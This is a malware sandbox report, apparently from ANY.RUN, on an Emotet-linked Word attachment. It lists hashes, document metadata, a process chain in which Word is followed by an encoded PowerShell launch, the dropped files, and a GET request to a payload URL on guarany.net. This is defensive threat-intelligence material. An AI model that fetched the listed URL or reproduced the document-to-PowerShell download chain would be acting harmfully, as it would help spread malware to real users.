| Field | Value |
|---|---|
| File name | Attachment_20201019_320.doc |
| Full analysis | https://app.any.run/tasks/1a7d5929-8c7a-4bb9-b60e-ea9922c81ae6 |
| Verdict | Malicious activity |
| Threats | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime it was upgraded into very destructive malware. It targets mostly corporate victims, but private users are also infected through mass spam email campaigns. |
| Analysis date | October 19, 2020, 23:23:58 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Recusandae., Author: Ambre Jacquet, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon Oct 19 17:24:00 2020, Last Saved Time/Date: Mon Oct 19 17:24:00 2020, Number of Pages: 1, Number of Words: 2121, Number of Characters: 12094, Security: 8 |
| MD5 | A0A42D997F0098D2216A47F0F0F3A358 |
| SHA1 | 2700972DB79F7D8E0269AA6BE5E4FDB4365FE536 |
| SHA256 | 9F17846CC14D83122DFDF29194E7FBA592B01F96202C26A7286FC163806C402B |
| SSDEEP | 3072:MJivKie6B/w2yiWydwt8GZ1L/UJFmk+cz9Sd+l4PJhERTM5/oKUQ2t1PuZFiZ5Rv:MJiP/w2PO8GZ1L/Uyk+E9Sd+l4PJhER3 |
| Extension | File type (match score) |
|---|---|
| .doc | Microsoft Word document (54.2) |
| .doc | Microsoft Word document (old ver.) (32.2) |
| Property | Value |
|---|---|
| CompObjUserType | Microsoft Word 97-2003 Document |
| CompObjUserTypeLen | 32 |
| LocaleIndicator | 1033 |
| CodePage | Unicode UTF-16, little endian |
| HeadingPairs | |
| TitleOfParts | - |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 15 |
| CharCountWithSpaces | 14187 |
| Paragraphs | 28 |
| Lines | 100 |
| Company | - |
| Security | Locked for annotations |
| Characters | 12094 |
| Words | 2121 |
| Pages | 1 |
| ModifyDate | 2020:10:19 16:24:00 |
| CreateDate | 2020:10:19 16:24:00 |
| TotalEditTime | - |
| Software | Microsoft Office Word |
| RevisionNumber | 1 |
| LastModifiedBy | - |
| Template | Normal.dotm |
| Comments | - |
| Keywords | - |
| Author | Ambre Jacquet |
| Subject | - |
| Title | Recusandae. |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 544 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Attachment_20201019_320.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| 1784 | POwersheLL -ENCOD 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 | C:\Windows\System32\WindowsPowerShell\v1.0\POwersheLL.exe | — | wmiprvse.exe |

| PID | User | Company | Integrity level | Description | Version |
|---|---|---|---|---|---|
| 544 | admin | Microsoft Corporation | MEDIUM | Microsoft Word | 14.0.6024.1000 |
| 1784 | admin | Microsoft Corporation | MEDIUM | Windows PowerShell | 6.1.7600.16385 (win7_rtm.090713-1255) |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR4CE0.tmp.cvr | — | — | — |
| 1784 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PBSKE8NNTGUA0PJDU58S.temp | — | — | — |
| 1784 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | F17FB243611FC8D2B382ABB444B83A98 | B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869 |
| 1784 | POwersheLL.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1259a1.TMP | binary | F17FB243611FC8D2B382ABB444B83A98 | B95F5437F7563958532D6FE5A6A4E471D1E48F06445CD5611E0B6BC977C67869 |
| 544 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | B60D0BA24317D732ABFF660F28162C59 | 120F590E212EEE3ED69612A35E809FE4483A7408CEA6E3D6F2B3F3C35556E30B |
| 544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$tachment_20201019_320.doc | pgc | 409F9DACAEA91D783FE193E1E565F739 | 5853FF4F71E7011BF3B754E0ED73489F624F28AE24556422DC6FED926F632532 |
| 544 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | F2EAE10C4CE3FF397FBD41CF0B744FC0 | D54A8D57A60513669680C77E8D27E354D71EF4D39F132135AED70956DB9F533C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1784 | POwersheLL.exe | GET | — | 177.12.163.114:80 | http://guarany.net/zefiro/K/ | BR | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1784 | POwersheLL.exe | 177.12.163.114:80 | guarany.net | IPV6 Internet Ltda | BR | suspicious |
| Domain | IP | Reputation |
|---|---|---|
| guarany.net | | suspicious |